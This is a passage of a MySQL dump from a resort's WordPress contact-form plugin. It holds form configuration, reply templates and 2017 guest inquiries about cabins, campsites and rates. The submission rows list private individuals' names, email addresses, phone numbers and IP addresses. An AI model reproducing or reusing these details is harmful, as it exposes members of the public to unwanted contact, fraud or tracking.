address:{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</div><div wdid=\"24\" class=\"wdform_row ui-sortable-handle\" style=\"opacity: 1;\">{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}24 - Issue type:{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</div><div wdid=\"22\" class=\"wdform_row ui-sortable-handle\">{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}22 - Subject:{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</div><div wdid=\"23\" class=\"wdform_row ui-sortable-handle\">{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}23 - Message:{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</div><div wdid=\"25\" class=\"wdform_row ui-sortable-handle\" disabled=\"yes\" style=\"opacity: 0.4;\">{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}25 - When is the best time to contact you:{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</div><div wdid=\"26\" class=\"wdform_row ui-sortable-handle\" disabled=\"yes\" style=\"opacity: 0.4;\">{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}26 - Which topic best describes your question?{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</div><div wdid=\"27\" class=\"wdform_row ui-sortable-handle\">{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}27 - Send a copy of this message to yourself:{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</div><div wdid=\"28\" class=\"wdform_row ui-sortable-handle\" style=\"opacity: 1;\">{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}28 - Type the characters you see here:{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</div><div wdid=\"29\" class=\"wdform_row ui-sortable-handle\" style=\"opacity: 0.4;\" disabled=\"yes\">{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}29 - {e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</div><div wdid=\"30\" class=\"wdform_row ui-sortable-handle\">{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}30 - type_submit_reset_30{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</div><div wdid=\"31\" class=\"wdform_row ui-sortable-handle\" disabled=\"yes\" style=\"opacity: 0.4;\">{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}31 - custom_31{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"32\" class=\"wdform_row ui-sortable-handle\">{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}32 - custom_32{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</div><div wdid=\"33\" class=\"wdform_row ui-sortable-handle\">{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}33 - map_33{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</div></div><div class=\"wdform_column ui-sortable\"></div><div class=\"wdform_column ui-sortable\"></div><div class=\"wdform_column ui-sortable\"></div><div class=\"wdform_column ui-sortable\"></div><div class=\"wdform_column ui-sortable\"></div><div class=\"wdform_column ui-sortable\"></div><div class=\"wdform_column ui-sortable\"></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\"><div style=\"width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\"><div style=\"width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}; display: table;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',4,'<div class=\"content_head\" style=\"color: #565759;\">\r\n<h1>Thank you for contacting us</h1>\r\n</div>\r\n<p>We have received your message and will respond to you within 24 hours (Monday-Friday).</p>\r\n<p>For urgent inquiries, please contact us using phone numbers down below.</p>','',3,'<p>{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}Your Name:{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} sent you a message from IP: {e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}ip{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</p>\r\n<p> </p>\r\n<p>{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}all{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</p>','<div class=\"content_head\" style=\"color: #565759;\">\r\n<h1>Dear {e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}Your Name:{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</h1>\r\n<h2>Thank you for contacting us</h2>\r\n</div>\r\n<p>We have received your message and will respond to you within 24 hours (Monday-Friday).</p>\r\n<p>For urgent inquiries, please contact us using phone numbers down below.</p>\r\n<p>Phone: 123-987-6543</p>\r\n<p>Fax: 123-987-6542</p>\r\n<p> </p>\r\n<p> </p>\r\n<p>{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}all{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</p>',34,1,'2#**id**#Your Name:#**label**#type_text#****#3#**id**#Name:#**label**#type_name#****#4#**id**#E-mail:#**label**#type_submitter_mail#****#5#**id**#Website:#**label**#type_text#****#6#**id**#Phone number:#**label**#type_text#****#7#**id**#Phone:#**label**#type_phone#****#8#**id**#Mobile:#**label**#type_phone#****#9#**id**#Street Address#**label**#type_address#****#10#**id**#Street Address Line 2#**label**#type_address#****#11#**id**#City#**label**#type_address#****#12#**id**#State / Province / Region#**label**#type_address#****#13#**id**#Postal / Zip Code#**label**#type_address#****#14#**id**#Country#**label**#type_address#****#15#**id**#Company:#**label**#type_text#****#16#**id**#Street Address#**label**#type_address#****#18#**id**#City#**label**#type_address#****#20#**id**#Postal / Zip Code#**label**#type_address#****#24#**id**#Issue type:#**label**#type_own_select#****#22#**id**#Subject:#**label**#type_text#****#23#**id**#Message:#**label**#type_textarea#****#25#**id**#When is the best time to contact you:#**label**#type_checkbox#****#26#**id**#Which topic best describes your question?#**label**#type_radio#****#27#**id**#Send a copy of this message to yourself:#**label**#type_send_copy#****#28#**id**#Type the characters you see here:#**label**#type_captcha#****#29#**id**##**label**#type_recaptcha#****#30#**id**#type_submit_reset_30#**label**#type_submit_reset#****#31#**id**#custom_31#**label**#type_editor#****#32#**id**#custom_32#**label**#type_editor#****#33#**id**#map_33#**label**#type_map#****#','2#**id**#Your Name:#**label**#type_text#****#3#**id**#Name:#**label**#type_name#****#4#**id**#E-mail:#**label**#type_submitter_mail#****#5#**id**#Website:#**label**#type_text#****#6#**id**#Phone number:#**label**#type_text#****#7#**id**#Phone:#**label**#type_phone#****#8#**id**#Mobile:#**label**#type_phone#****#9#**id**#Street Address#**label**#type_address#****#10#**id**#Street Address Line 2#**label**#type_address#****#11#**id**#City#**label**#type_address#****#12#**id**#State / Province / Region#**label**#type_address#****#13#**id**#Postal / Zip Code#**label**#type_address#****#14#**id**#Country#**label**#type_address#****#15#**id**#Company:#**label**#type_text#****#16#**id**#Street Address#**label**#type_address#****#18#**id**#City#**label**#type_address#****#20#**id**#Postal / Zip Code#**label**#type_address#****#24#**id**#Issue type:#**label**#type_own_select#****#22#**id**#Subject:#**label**#type_text#****#23#**id**#Message:#**label**#type_textarea#****#25#**id**#When is the best time to contact you:#**label**#type_checkbox#****#26#**id**#Which topic best describes your question?#**label**#type_radio#****#27#**id**#Send a copy of this message to yourself:#**label**#type_send_copy#****#28#**id**#Type the characters you see here:#**label**#type_captcha#****#29#**id**##**label**#type_recaptcha#****#30#**id**#type_submit_reset_30#**label**#type_submit_reset#****#31#**id**#custom_31#**label**#type_editor#****#32#**id**#custom_32#**label**#type_editor#****#33#**id**#map_33#**label**#type_map#****#','0','','','','1*:*id*:*type_section_break*:*type*:*custom_1*:*w_field_label*:*<h4 style=\"font-size: 30px; font-family: Bitter, Georgia, serif; clear: both; line-height: 1.3; margin: 25px 0px;\" data-mce-style=\"font-size: 30px; font-family: Bitter, Georgia, serif; clear: both; line-height: 1.3; margin: 25px 0px;\">Have Questions or Comments?<br></h4><div style=\"color: rgb(20, 20, 18); font-family: Source Sans Pro, Helvetica, sans-serif; font-size: 16px; line-height: 24px;\">You may contact us by filling in this form any time you need professional support or have any questions. You can also fill in the form to leave your comments or feedback.</div>*:*w_editor*:**:*new_field*:*2*:*id*:*type_text*:*type*:*Your Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*180*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:**:*new_field*:*3*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*77*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_autofill*:**:*new_field*:*4*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*180*:*w_size*:*someone@example.com*:*w_first_val*:*someone@example.com*:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:*no*:*w_autofill*:**:*new_field*:*5*:*id*:*type_text*:*type*:*Website:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*180*:*w_size*:*example.com*:*w_first_val*:*example.com*:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:**:*new_field*:*6*:*id*:*type_text*:*type*:*Phone number:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*180*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:**:*new_field*:*7*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*100*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*8*:*id*:*type_phone*:*type*:*Mobile:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*100*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*9*:*id*:*type_address*:*type*:*Address:*:*w_field_label*:*100*:*w_field_label_size*:*top*:*w_field_label_pos*:*280*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*15*:*id*:*type_text*:*type*:*Company:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*180*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:**:*new_field*:*16*:*id*:*type_address*:*type*:*Company address:*:*w_field_label*:*100*:*w_field_label_size*:*top*:*w_field_label_pos*:*280*:*w_size*:*Street Address***Street Address Line 2***City***State / Province / Region***Postal / Zip Code***Country*:*w_mini_labels*:*no***yes***no***yes***no***yes***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*24*:*id*:*type_own_select*:*type*:*Issue type:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*180*:*w_size*:*(Select a Topic)***New Reservation***Existing Reservation***Questions about our resort***Other*:*w_choices*:*true***false***false***false***false*:*w_choices_checked*:*false***false***false***false***false*:*w_choices_disabled*:*no*:*w_required*:*wdform_select*:*w_class*:**:*new_field*:*22*:*id*:*type_text*:*type*:*Subject:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*180*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:**:*new_field*:*23*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*120*:*w_field_label_size*:*top*:*w_field_label_pos*:*290*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*25*:*id*:*type_checkbox*:*type*:*When is the best time to contact you:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*ver*:*w_flow*:*Morning***Afternoon***Evening*:*w_choices*:*false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:**:*w_class*:**:*new_field*:*26*:*id*:*type_radio*:*type*:*Which topic best describes your question?*:*w_field_label*:*280*:*w_field_label_size*:*top*:*w_field_label_pos*:*ver*:*w_flow*:*Product Support***Site Suggestions***Marketing & Sponsorship Opportunities***Referral Programs***Other*:*w_choices*:*false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:**:*w_class*:**:*new_field*:*27*:*id*:*type_send_copy*:*type*:*Send a copy of this message to yourself:*:*w_field_label*:*260*:*w_field_label_size*:*left*:*w_field_label_pos*:*false*:*w_first_val*:*no*:*w_required*:**:*new_field*:*28*:*id*:*type_captcha*:*type*:*Type the characters you see here:*:*w_field_label*:*250*:*w_field_label_size*:*top*:*w_field_label_pos*:*6*:*w_digit*:**:*w_class*:**:*new_field*:*29*:*id*:*type_recaptcha*:*type*:* *:*w_field_label*:*250*:*w_field_label_size*:*top*:*w_field_label_pos*:**:*w_public*:**:*w_private*:**:*w_theme*:**:*w_class*:**:*new_field*:*30*:*id*:*type_submit_reset*:*type*:*type_submit_reset_30*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*31*:*id*:*type_editor*:*type*:*custom_31*:*w_field_label*:*<p><span style=\"color: rgb(153, 0, 0); font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: normal; background-color: rgb(244, 244, 244);\">* Indicates required fields</span></p>*:*w_editor*:**:*new_field*:*32*:*id*:*type_editor*:*type*:*custom_32*:*w_field_label*:*<p><strong>Ashby Resort and Campgrounds</strong></p><p>10415 County Road 82<br></p><p>Ashby, Minnesota 56309<br data-mce-bogus=\"1\"></p><p>Phone: 218-747-2959</p><p><br></p>*:*w_editor*:**:*new_field*:*33*:*id*:*type_map*:*type*:*map_33*:*w_field_label*:*-95.80761510000002*:*w_center_x*:*46.0931781*:*w_center_y*:*-95.807615*:*w_long*:*46.093178*:*w_lat*:*10*:*w_zoom*:*300*:*w_width*:*400*:*w_height*:**:*w_info*:*wdform_map*:*w_class*:**:*new_field*:*',1,1,'*','4','','4','*4*',1,'','','','','3,5,6,8,9,10,11,12,13,14,15,16,17,18,19,20,21,25,26,29,31,','','','','','{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}Subject:{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e','{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}Subject:{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e',1,1,1,1);
/*!40000 ALTER TABLE `ar_contactformmaker` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_contactformmaker_blocked`
--

DROP TABLE IF EXISTS `ar_contactformmaker_blocked`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_contactformmaker_blocked` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `ip` varchar(128) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_contactformmaker_blocked`
--

LOCK TABLES `ar_contactformmaker_blocked` WRITE;
/*!40000 ALTER TABLE `ar_contactformmaker_blocked` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_contactformmaker_blocked` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_contactformmaker_submits`
--

DROP TABLE IF EXISTS `ar_contactformmaker_submits`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_contactformmaker_submits` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `form_id` int(11) NOT NULL,
  `element_label` varchar(128) NOT NULL,
  `element_value` varchar(600) NOT NULL,
  `group_id` int(11) NOT NULL,
  `date` datetime NOT NULL,
  `ip` varchar(128) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=779 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_contactformmaker_submits`
--

LOCK TABLES `ar_contactformmaker_submits` WRITE;
/*!40000 ALTER TABLE `ar_contactformmaker_submits` DISABLE KEYS */;
INSERT INTO `ar_contactformmaker_submits` VALUES (1,10,'2','David Conway',1,'2017-01-19 00:44:20','47.203.137.20'),(2,10,'4','dbc@expcom.com',1,'2017-01-19 00:44:20','47.203.137.20'),(3,10,'7','727 4908660',1,'2017-01-19 00:44:20','47.203.137.20'),(4,10,'24','Questions about our resort',1,'2017-01-19 00:44:20','47.203.137.20'),(5,10,'22','test',1,'2017-01-19 00:44:20','47.203.137.20'),(6,10,'23','test',1,'2017-01-19 00:44:20','47.203.137.20'),(7,10,'2','Jonathan Martins',2,'2017-01-22 10:44:45','192.3.79.100'),(8,10,'4','jonathannmarttins@gmail.com',2,'2017-01-22 10:44:45','192.3.79.100'),(9,10,'7','917 7655461',2,'2017-01-22 10:44:45','192.3.79.100'),(10,10,'24','(Select a Topic)',2,'2017-01-22 10:44:45','192.3.79.100'),(11,10,'22','inquiry',2,'2017-01-22 10:44:45','192.3.79.100'),(12,10,'23','Dear Reservation Manager\r\n\r\nI would like to make a reserve accommodation for rooms in your hotel.\r\n\r\nWe are a family of six with my wife and four children ( Age between 22 and 28). We’d like to book three of your (deluxe,queen or king rooms) starting 28th April to 15th May.\r\n\r\nI would like to know about the process for booking, i.e. the payment and other policies that apply to the guests at your hotel.\r\n\r\nPlease revert back with the aforesaid grand total charges for 3 rooms at the earliest so that I can make the booking accordingly.\r\n\r\nKind Regards\r\nJonathan Martins',2,'2017-01-22 10:44:45','192.3.79.100'),(13,10,'2','Tyler HOMMERDING',3,'2017-02-01 03:02:40','104.159.151.48'),(14,10,'4','tylerhommerding@gmail.com',3,'2017-02-01 03:02:40','104.159.151.48'),(15,10,'7','320 4938256',3,'2017-02-01 03:02:40','104.159.151.48'),(16,10,'24','New Reservation',3,'2017-02-01 03:02:40','104.159.151.48'),(17,10,'22','rates',3,'2017-02-01 03:02:40','104.159.151.48'),(18,10,'23','i am wondering what the rate is for a  spot that i could park an ice castle fish house, dosent need water but electric would be nice, we are looking at six adults and having two tents on the site. what would the rate be for a weekend in july ',3,'2017-02-01 03:02:40','104.159.151.48'),(19,10,'2','Wendy Weickert',4,'2017-02-03 02:53:56','174.219.131.253'),(20,10,'4','wendyweickert@hotmail.com',4,'2017-02-03 02:53:56','174.219.131.253'),(21,10,'7','701 7995140',4,'2017-02-03 02:53:56','174.219.131.253'),(22,10,'24','New Reservation',4,'2017-02-03 02:53:56','174.219.131.253'),(23,10,'22','Trying to book online',4,'2017-02-03 02:53:56','174.219.131.253'),(24,10,'23','Do you have any openings Feb 24-26? The one calendar shows like it does and when I clicked to book on the other it said there was a problem..Could you let me know if there\\&#039;s any availability? Thank you!',4,'2017-02-03 02:53:56','174.219.131.253'),(25,10,'2','Jeanne Schleppenbach',5,'2017-02-05 01:34:04','74.44.210.198'),(26,10,'4','JeanneMS54@hotmail.com',5,'2017-02-05 01:34:04','74.44.210.198'),(27,10,'7','952 4324207',5,'2017-02-05 01:34:04','74.44.210.198'),(28,10,'24','Questions about our resort',5,'2017-02-05 01:34:04','74.44.210.198'),(29,10,'22','Tent sites',5,'2017-02-05 01:34:04','74.44.210.198'),(30,10,'23','Could you let me know which sites are only for tents? Are they in the sun, shade or partial? It looks as though some sites are closer to the main road. How busy/noisy is this road?',5,'2017-02-05 01:34:04','74.44.210.198'),(31,10,'2','Judy Johnson ',6,'2017-02-12 19:29:23','69.84.75.116'),(32,10,'4','johnson.judy504@gmail.com',6,'2017-02-12 19:29:23','69.84.75.116'),(33,10,'7','701 2235370',6,'2017-02-12 19:29:23','69.84.75.116'),(34,10,'24','New Reservation',6,'2017-02-12 19:29:23','69.84.75.116'),(35,10,'22','Availability ',6,'2017-02-12 19:29:23','69.84.75.116'),(36,10,'23','I don&#039;t think my email was sent. Wondering what was available the first week in August. Thanks',6,'2017-02-12 19:29:23','69.84.75.116'),(37,10,'2','Mike',7,'2017-02-15 16:35:32','69.165.31.210'),(38,10,'4','ashbyresort@hotmail.com',7,'2017-02-15 16:35:32','69.165.31.210'),(39,10,'7','218 7472959',7,'2017-02-15 16:35:32','69.165.31.210'),(40,10,'24','Other',7,'2017-02-15 16:35:32','69.165.31.210'),(41,10,'22','test',7,'2017-02-15 16:35:32','69.165.31.210'),(42,10,'23','looks like a great place to stay \r\nyour prices are way to cheep \r\nis the red head still there?',7,'2017-02-15 16:35:32','69.165.31.210'),(43,10,'2','Joann Brown',8,'2017-02-18 02:08:05','69.42.243.218'),(44,10,'4','groovylittlerockstar@gmail.com',8,'2017-02-18 02:08:05','69.42.243.218'),(45,10,'7','320 8157682',8,'2017-02-18 02:08:05','69.42.243.218'),(46,10,'24','Questions about our resort',8,'2017-02-18 02:08:05','69.42.243.218'),(47,10,'22','seasonal 2017',8,'2017-02-18 02:08:05','69.42.243.218'),(48,10,'23','Do you have any seasonal sites available for 2017? ',8,'2017-02-18 02:08:05','69.42.243.218'),(49,10,'2','Kacy',9,'2017-03-05 21:36:13','67.7.111.216'),(50,10,'4','kacygeiger@aol.com',9,'2017-03-05 21:36:13','67.7.111.216'),(51,10,'7',' ',9,'2017-03-05 21:36:13','67.7.111.216'),(52,10,'24','New Reservation',9,'2017-03-05 21:36:13','67.7.111.216'),(53,10,'22','Cabin Availability',9,'2017-03-05 21:36:13','67.7.111.216'),(54,10,'23','Do you have any of these cabins available during June 30-July 4 or July 22-29?&#039;\r\nCabin 10, 11, 12, 13, 14',9,'2017-03-05 21:36:13','67.7.111.216'),(55,10,'2','John &amp; Joni Peterson',10,'2017-03-07 01:38:10','70.196.70.157'),(56,10,'4','john.peterson@emerson.com',10,'2017-03-07 01:38:10','70.196.70.157'),(57,10,'7','281 4553832',10,'2017-03-07 01:38:10','70.196.70.157'),(58,10,'24','New Reservation',10,'2017-03-07 01:38:10','70.196.70.157'),(59,10,'22','July 9 &amp; 10',10,'2017-03-07 01:38:10','70.196.70.157'),(60,10,'23','Can we book a motel room (sleeper or kitchenette) that sleeps 4 (2 adult couples) or 2 rooms for 1 couple each on these dates?',10,'2017-03-07 01:38:10','70.196.70.157'),(61,10,'2','Sandy',11,'2017-03-15 02:44:00','162.218.43.197'),(62,10,'4','bsourada@mvtvwireless.com',11,'2017-03-15 02:44:00','162.218.43.197'),(63,10,'7','507 8288124',11,'2017-03-15 02:44:00','162.218.43.197'),(64,10,'24','Questions about our resort',11,'2017-03-15 02:44:00','162.218.43.197'),(65,10,'22','Sites',11,'2017-03-15 02:44:00','162.218.43.197'),(66,10,'23','Do you have 5-7 campsites available for July 27-30?',11,'2017-03-15 02:44:00','162.218.43.197'),(67,10,'2','Kevin Gisolf',12,'2017-03-15 14:33:37','192.43.65.245'),(68,10,'4','vipphoto@mtcnet.net',12,'2017-03-15 14:33:37','192.43.65.245'),(69,10,'7','605 2015203',12,'2017-03-15 14:33:37','192.43.65.245'),(70,10,'24','Other',12,'2017-03-15 14:33:37','192.43.65.245'),(71,10,'22','Fishing Bucket hats',12,'2017-03-15 14:33:37','192.43.65.245'),(72,10,'23','Do you sell fishing bucket hats? Ye I know this is a dumb question. And ye I am going to be contacting you about reservations for a cabin shortly. ',12,'2017-03-15 14:33:37','192.43.65.245'),(73,10,'2','Missy Thompson',13,'2017-03-18 15:11:26','98.212.35.143'),(74,10,'4','Mandmt2012@gmail.com',13,'2017-03-18 15:11:26','98.212.35.143'),(75,10,'7','815 6013031',13,'2017-03-18 15:11:26','98.212.35.143'),(76,10,'24','Questions about our resort',13,'2017-03-18 15:11:26','98.212.35.143'),(77,10,'22','Rental',13,'2017-03-18 15:11:26','98.212.35.143'),(78,10,'23','Looking to rent August 8-11. The new cabin on the water. Looking for price and availability. Thank you!!',13,'2017-03-18 15:11:26','98.212.35.143'),(79,10,'2','Missy Thompson',14,'2017-03-18 17:03:04','98.212.35.143'),(80,10,'4','Mandmt2012@gmail.com',14,'2017-03-18 17:03:04','98.212.35.143'),(81,10,'7','815 6013031',14,'2017-03-18 17:03:04','98.212.35.143'),(82,10,'24','New Reservation',14,'2017-03-18 17:03:04','98.212.35.143'),(83,10,'22','Pricing',14,'2017-03-18 17:03:04','98.212.35.143'),(84,10,'23','We are looking at the newly remodeled room at the hotel. Looking for pricing and availability for August 8-11th.',14,'2017-03-18 17:03:04','98.212.35.143'),(85,10,'2','Kacy Geiger',15,'2017-03-20 00:58:37','63.155.227.120'),(86,10,'4','kacygeiger@aol.com',15,'2017-03-20 00:58:37','63.155.227.120'),(87,10,'7','701 3209236',15,'2017-03-20 00:58:37','63.155.227.120'),(88,10,'24','Questions about our resort',15,'2017-03-20 00:58:37','63.155.227.120'),(89,10,'22','large groups',15,'2017-03-20 00:58:37','63.155.227.120'),(90,10,'23','Hi,\r\nwe have a family gathering every summer and are looking for a new resort to attend. do you have 10 tent spots or can you put multiple tents in each spot? I saw you were full the weekend we have available this Summer but would possibly be interested into next summer.\r\nThank you! ',15,'2017-03-20 00:58:37','63.155.227.120'),(91,10,'2','Kim Olson',16,'2017-03-21 20:10:49','24.131.171.136'),(92,10,'4','bugs1999@comcast.net',16,'2017-03-21 20:10:49','24.131.171.136'),(93,10,'7','763 5465959',16,'2017-03-21 20:10:49','24.131.171.136'),(94,10,'24','Existing Reservation',16,'2017-03-21 20:10:49','24.131.171.136'),(95,10,'22','Barry reunion',16,'2017-03-21 20:10:49','24.131.171.136'),(96,10,'23','Just got your letter in the mail.  Yes, we are planning to stay in Kitchenette 7 starting August 5.  I will send you a down payment this week.\r\nHappy Spring!!!!',16,'2017-03-21 20:10:49','24.131.171.136'),(97,10,'2','Kim Olson',17,'2017-03-21 20:10:54','24.131.171.136'),(98,10,'4','bugs1999@comcast.net',17,'2017-03-21 20:10:54','24.131.171.136'),(99,10,'7','763 5465959',17,'2017-03-21 20:10:54','24.131.171.136'),(100,10,'24','Existing Reservation',17,'2017-03-21 20:10:54','24.131.171.136'),(101,10,'22','Barry reunion',17,'2017-03-21 20:10:54','24.131.171.136'),(102,10,'23','Just got your letter in the mail.  Yes, we are planning to stay in Kitchenette 7 starting August 5.  I will send you a down payment this week.\r\nHappy Spring!!!!',17,'2017-03-21 20:10:54','24.131.171.136'),(103,10,'2','Kim Olson',18,'2017-03-21 20:10:59','24.131.171.136'),(104,10,'4','bugs1999@comcast.net',18,'2017-03-21 20:10:59','24.131.171.136'),(105,10,'7','763 5465959',18,'2017-03-21 20:10:59','24.131.171.136'),(106,10,'24','Existing Reservation',18,'2017-03-21 20:10:59','24.131.171.136'),(107,10,'22','Barry reunion',18,'2017-03-21 20:10:59','24.131.171.136'),(108,10,'23','Just got your letter in the mail.  Yes, we are planning to stay in Kitchenette 7 starting August 5.  I will send you a down payment this week.\r\nHappy Spring!!!!',18,'2017-03-21 20:10:59','24.131.171.136'),(109,10,'2','Sandra',19,'2017-03-21 20:20:20','173.215.47.228'),(110,10,'4','sandraeastin@gmail.com',19,'2017-03-21 20:20:20','173.215.47.228'),(111,10,'7','319 5721452',19,'2017-03-21 20:20:20','173.215.47.228'),(112,10,'24','New Reservation',19,'2017-03-21 20:20:20','173.215.47.228'),(113,10,'22','July cabin rental?',19,'2017-03-21 20:20:20','173.215.47.228'),(114,10,'23','Our family is looking for a cabin to rent in July.   Our group is 4 